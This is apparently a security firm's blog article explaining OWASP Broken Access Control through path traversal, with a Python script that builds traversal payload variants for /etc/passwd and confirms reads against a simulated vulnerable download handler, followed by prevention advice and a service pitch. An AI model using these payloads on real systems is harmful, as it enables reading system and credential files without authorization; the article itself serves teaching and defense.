OWASP Top 5 – Broken Access Control


OWASP Top 5 – Broken Access Control is the fifth entry (A5) on the 2017 OWASP Top 10 list; the 2021 edition moved it to first place. Access control, or authorization, is how a web application grants access to content and functions to some users and not to others.

Many of these access schemes were never deliberately designed; they simply evolved alongside the website. In these cases the access control rules are scattered through the code and the file folders. By the time the site approaches production, the set of rules has become so unwieldy that it is almost impossible to understand, let alone audit.

Many of these flawed access control schemes are not difficult to discover and exploit, and once a flaw is found the consequences can be devastating. Beyond viewing unauthorized content, an attacker could change or delete content, perform unauthorized functions, or even take over the administration of the site, with all the reputational damage that implies for the affected company.

Let’s examine an example of broken access control. To follow the demonstration, keep in mind that a website is served from files and folders on the server’s operating system, each with its own permissions. When the application lets a visitor influence which file is read, and the files it can reach are readable by the account the web server runs as, an attacker can pull configuration files that hold passwords, keys or other confidential data.

OWASP Top 5 – Anatomy of a Website Attack

An experienced attacker will analyse a web page for possible vulnerabilities in detail long before actually attacking the target. In this case, during the enumeration process, the attacker may find several weaknesses, among them the one called a “Path Traversal Attack”.

This small report from the scanner shows the name of the vulnerability, the URL of the affected page, the risk rating (high in this case), and the evidence with which the tool confirmed that the flaw is exploitable: a fragment of the file it retrieved, here “root:x:0:0”, the start of the first line of the server’s /etc/passwd.
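As an added illustration of the check a scanner performs before it reports evidence like the line above (example code written for this article, not the scanner’s own code), the block below generates the usual traversal payload variants, labels a response as exploitable only when the body actually contains the file content, and runs the check against a constructed stand-in for a vulnerable download handler so that it works offline. The `/download?file=` parameter, the document root `/var/www/html` and the fake filesystem are assumptions made for the example.

```python
import os
import re
from typing import Callable, List, Optional
from urllib.parse import quote, unquote

# File that traversal scanners usually probe for on Unix targets, and the
# evidence pattern that confirms the read (the "root:x:0:0" line above).
PROBE_TARGET = "etc/passwd"
EVIDENCE = re.compile(r"^root:x:0:0:", re.MULTILINE)


def traversal_payloads(target: str = PROBE_TARGET, max_depth: int = 6) -> List[str]:
    """Payload variants a scanner tries for one target file.

    Each variant is repeated for depths 1..max_depth because the vulnerable
    handler may sit several directories below the filesystem root.
    """
    payloads = []
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + target
        payloads.append(plain)                             # ../../etc/passwd
        payloads.append(quote(plain, safe=""))             # ..%2F..%2Fetc%2Fpasswd
        payloads.append(plain.replace("../", "..%252f"))   # double-encoded, beats one-pass filters
        payloads.append(plain.replace("/", "\\"))          # ..\..\etc\passwd (Windows separators)
    payloads.append("/" + target)                          # absolute path, for join() that drops the root
    return payloads


def classify_response(body: str) -> str:
    """Label a response the way the report above does: 'exploitable' only
    when the body contains the file content, not merely an odd status."""
    return "exploitable" if EVIDENCE.search(body) else "not confirmed"


def confirm_traversal(send: Callable[[str], str],
                      target: str = PROBE_TARGET) -> Optional[str]:
    """Send each payload through `send(payload) -> response body` and return
    the first payload whose response proves the read, or None."""
    for payload in traversal_payloads(target):
        if classify_response(send(payload)) == "exploitable":
            return payload
    return None


# Constructed stand-in for a vulnerable target (assumption, not a real host):
# a download handler three directories below "/" that URL-decodes once and
# joins the parameter onto its document root without any containment check.
_FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
    "/var/www/html/index.html": "<html>welcome</html>",
}


def fake_vulnerable_server(payload: str) -> str:
    """Simulates GET /download?file=<payload> against the constructed filesystem."""
    path = os.path.normpath(os.path.join("/var/www/html", unquote(payload)))
    return _FAKE_FS.get(path, "<html>404 not found</html>")


if __name__ == "__main__":
    print("confirmed with payload:", confirm_traversal(fake_vulnerable_server))
```

Against the stand-in, the first payload that comes back with file content is `../../../etc/passwd`: three levels because the document root sits three directories deep. The encoded and backslash variants matter against real targets whose framework or filter decodes differently; the evidence regex is what keeps the result a confirmed finding rather than a guess.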

A path traversal attack (also known as directory traversal) aims to access files and directories stored outside the web root folder. By manipulating variables that refer to files with “dot-dot-slash (../)” sequences and their variations (URL-encoded forms such as %2e%2e%2f, or backslashes on Windows), or by supplying absolute file paths, it is possible to read arbitrary files and directories on the file system, including source code, application settings and critical system files. What the traversal can actually read is bounded by the operating system’s own access control: the permissions on folders and files, as they apply to the account the web server runs as.

If we open the same URL that the analysis tool shows in any web browser, we get the contents of the file /etc/passwd that resides on the server.

Other, more specialized tools can push the same flaw further. On its own a traversal is a read primitive; it becomes a direct remote connection to the server only when the application offers something to combine it with, such as an upload location the attacker controls or a file-inclusion feature that executes what it reads.

It is important to understand why the scan results and the unauthorized access to these files are possible. Two things usually occur together: the application builds a file path from user-controlled input without restricting it to the web root, and the files it reaches are readable by the account the web server runs as. Permissions alone would not have stopped this particular read (/etc/passwd is world-readable on Unix systems by design), but they decide how much else the attacker can reach: configuration files, keys and source code. The same combination can exist on your corporate website.

How can I determine if I am vulnerable to these types of attacks?

To answer this question, start with the access control policy your technology department should have documented. Does your company have a policy that guides website administrators when creating new users and assigning permissions to system files and folders? Does it state which files the account running the web server may read? If no such policy exists, it is very likely that your web applications are affected: a flaw like the one above would allow information to be extracted from your servers or let a user reach data that user should not access.

In short, if there is no defined policy for creating users and assigning permissions to files and folders, your website is most likely vulnerable, and only testing will tell you how badly.

How can RedDefense Global help me to keep my corporate website safe?

RedDefense Global puts your corporate websites and databases to the test. We use advanced scanners, manual penetration testing and other techniques and procedures, which may include crawling, request tampering, code review and a review of file and folder permissions. All of this is done in coordination with the internal staff in charge of your information systems. These steps are necessary to find out whether potential vulnerabilities are false positives or real. For the real ones, we provide effective methods to patch, update or remove the vulnerability as the situation requires, to keep your environment safe.

SOLUTION AND PREVENTION

https://www.reddefenseglobal.com/services

Additional resources regarding this type of attack:

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A5-Broken_Access_Control.html

https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet.html

https://cwe.mitre.org/data/definitions/22.html

https://cwe.mitre.org/data/definitions/284.html

https://cwe.mitre.org/data/definitions/285.html

https://cwe.mitre.org/data/definitions/639.html

Some applications with this type of vulnerabilities cataloged by CVE:

CVE-2019-13405

CVE-2018-18392

CVE-2019-16919